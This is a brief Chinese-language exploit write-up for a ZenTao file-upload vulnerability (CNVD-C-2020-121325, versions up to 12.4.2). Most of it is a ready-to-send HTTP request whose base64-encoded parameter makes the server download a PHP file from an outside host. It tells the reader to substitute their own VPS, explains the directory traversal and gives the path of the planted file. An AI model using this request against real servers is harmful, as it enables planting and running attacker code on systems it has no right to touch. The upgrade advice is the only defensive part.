CNVD-C-2020-121325禅道文件上传漏洞
CNVD-C-2020-121325禅道文件上传漏洞
CNVD-C-2020-121325文件上传漏洞主要影响以下禅道版本:
禅道开源版<=12.4.2,建议升级到禅道12.4.3以上版本
利用条件:需要后台权限
GET /zentao/client-download-1-aHR0cDovLzEyMC43OC4xMjkuMjA5OjgwODEveC5waHRtbA==-macOSzip1.html HTTP/1.1
Host: 127.0.0.1:8012
User-Agent: Mozilla/5.0 (Android 9.0; Mobile; rv:66.0) Gecko/66.0 Firefox/66.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Referer: http://127.0.0.1:8012/zentao/client-checkupgrade.html
Cookie: lang=zh-cn; device=mobile; theme=default; from=doc; windowWidth=1743; windowHeight=1023; zentaosid=m5fveqc6j4gm6prf9smt15j6t1
根据aHR0cDovLzEyMC43OC4xMjkuMjA5OjgwODEveC5waHRtbA==可以修改成自己的vps。
-1-
是目录1,可以跨目录。
跨目录的前提是最开始的clinet自动创建下可以进行跨目录。
对应url的php文件地址:
http://127.0.0.1:8012/zentao/data/client/1/x.php
“优秀者模仿 , 伟大者剽窃。”